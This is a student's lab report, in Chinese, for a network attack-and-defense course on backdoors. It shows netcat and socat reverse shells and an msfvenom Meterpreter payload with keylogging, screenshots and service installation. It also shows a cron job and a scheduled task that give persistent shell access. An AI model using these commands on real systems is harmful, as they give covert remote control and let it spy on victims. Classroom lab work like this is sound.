20145208 蔡野 《网络攻防》 后门原理与实践
实验内容概述
- 简单实用netcat和socat获取靶机shell,并实现任务计划启动;使用msf-meterpreter生成可执行后门文件获取靶机shell,并进行一些命令操作,如查看ip、截屏、记录键盘输入、获取ruby交互界面、进程迁移、安装成服务等。
基础问题回答
-
如何将一个后门安装到系统中?
- 将后门程序伪装进软件中进去系统。
- 在其他软件或文件中进行捆绑。
-
后门如何启动起来(win及linux)?
- windwos之中设置任务启动计划,在linux之中设置cron。
-
Meterpreter有哪些给你映像深刻的功能?
- 键盘记录,可以猜测他人密码或其他键入信息。
- 截屏。可以看的别人屏幕。
- 视频。想想就可怕****
-
如何发现自己有系统有没有被安装后门?
- 如果莫名其妙的卡顿出现,或者内存占有忽然变高,或者感觉有什么异常的,都有可能是后门。
实验过程记录
使用netcat获取主机操作Shell,cron启动
linux获取windows的shell
- 首先两个操作系统中都要有ncat,kali中已经自带,window需要下载码云上的压缩包到window中,解压到相应的system中可以直接在命令行中运行。
- kali下使用ifconfig来获取卡里主机的ip。
- 在kali下使用
nc -l -p 5208来将5208设置成监听端口开始监听,windows下输入netcat.exe -e cmd 172.30.2.230 5208实现kali对windowsshell的控制并利用ipconfig来验证。
windows获取linux的shell
- windows下使用以下命令
netcat.exe 172.30.2.230 5208监听 - kali下使用
nc -e /bin/sh -l -p 5208反弹连接windows - 利用ifconfig验证
ncat传输文件
- windows系统使用
ncat.exe -lv 1452 > cy_file.exe监听准备接受文件 - kali系统使用
ncat -nv 172.30.3.151 1452 <pwnx来发送指定文件
使用socat获取主机操作Shell
- windows利用socat获取kali的shell:
- kali上用
socat tcp-listen:5208把cmd绑定到端口5208 - 同時用
socat tcp-l:5208 system:bash,pty,stderr反弹连接 - windows使用
socat readline tcp:172.30.2.230 5208开启监听 - 成功,使用ifconfig检测
meterpreter
生成后门程序
- 使用命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.2.230 LPORT=208 -f exe >20145208.exe来生成后门程序,然后发送到windows机中。
- 使用msfconsole命令开启msf进行设置
- 这时候监听已经开始了,在windows中运行之前的后门程序可以成功控制远程shell。
meterpreter信息搜集
- 查看系统版本信息
- 对靶机进行截图
- 记录键盘输入
- 安装为系统服务(两种方法,第一种可能因为权限原因失败,第二种成功)
后门启动
Windows
- 在控制面板-管理工具-任务计划程序中添加任务
- 添加名称,新建触发器,新建内容
- 这里我设置成当靶机锁定的时候自动连接,也可以设置成其他条件,如开机启动或其他条件。测试有效:
cron启动
-
kali下终端使用
crontab -e修改配置文件,根据格式m h dom mon dow user command来填写启动的时间,加入下面一行:
* * * * * /bin/netcat 172.30.2.230 5208 -e /bin/sh -
第一个星号可以设置成0-59的数字,即每小时的第几分钟启动,同理下个星号是1-24,下个是1-12···
-
使用
crontab -l查看配置文件(老师的kali原本自带了一个地址)
- 这样就使得kali系统内每分钟自动运行指令,反弹至pc端的5208端口。
实验感想
- 真是发现了自己的电脑安全多么脆弱,下了那么多盗版的正版的软件,不知道有多少后门,先把摄像头糊上再说